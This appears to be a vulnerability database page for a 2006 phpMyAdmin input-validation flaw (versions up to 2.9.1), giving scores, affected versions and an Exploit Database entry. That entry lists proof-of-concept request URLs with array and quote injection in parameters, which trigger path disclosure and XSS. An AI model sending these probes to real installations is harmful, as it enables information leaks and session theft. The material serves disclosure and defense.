Related Weaknesses
CWE-ID |
Weakness Name |
Source |
CWE-20 |
Improper Input Validation The product receives input or data, but it does
not validate or incorrectly validates that the input has the
properties that are required to process the data safely and
correctly. |
|
Metrics
Metrics |
Score |
Severity |
CVSS Vector |
Source |
V2 |
5 |
|
AV:N/AC:L/Au:N/C:P/I:N/A:N |
nvd@nist.gov |
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
Exploit information
Exploit Database EDB-ID : 29062
Publication date : 2006-09-14 22h00 +00:00
Author : laurent gaffie
EDB Verified : Yes
source: https://www.securityfocus.com/bid/21137/info
phpMyAdmin is prone to multiple input-validation vulnerabilities, including an HTML-injection vulnerability, cross-site scripting vulnerabilities, and information-disclosure vulnerabilities.
An attacker could exploit these vulnerabilities to view sensitive information or to have arbitrary script code execute in the context of the affected site, which may allow the attacker to steal cookie-based authentication credentials or change the way the site is rendered to the user. Data gained could aid in further attacks.
All versions of phpMyAdmin are vulnerable.
http://www.example.com/scripts/check_lang.php
http://www.example.com/themes/darkblue_orange/layout.inc.php
http://www.example.com/index.php?lang[]=
http://www.example.com/index.php?target[]=
http://www.example.com/index.php?db[]=
http://www.example.com/index.php?goto[]=
http://www.example.com/left.php?server[]=
http://www.example.com/index.php?table[]=
http://www.example.com/server_databases.php?token=your_token&sort_by="
http://www.example.com/index.php?db=information_schema&token=your_token&tbl_group[]= http://www.example.com/db_printview.php?db="
http://www.example.com/sql.php?back[]=
Products Mentioned
Configuraton 0
Phpmyadmin>>Phpmyadmin >> Version To (including) 2.9.1
Phpmyadmin>>Phpmyadmin >> Version 2.9.0
Phpmyadmin>>Phpmyadmin >> Version 2.9.0.1
Phpmyadmin>>Phpmyadmin >> Version 2.9.0.2
Phpmyadmin>>Phpmyadmin >> Version 2.9.0.3
Phpmyadmin>>Phpmyadmin >> Version 2.9.0_beta1
Phpmyadmin>>Phpmyadmin >> Version 2.9.0_rc1
Phpmyadmin>>Phpmyadmin >> Version 2.9.1_rc1
Phpmyadmin>>Phpmyadmin >> Version 2.9.1_rc2
References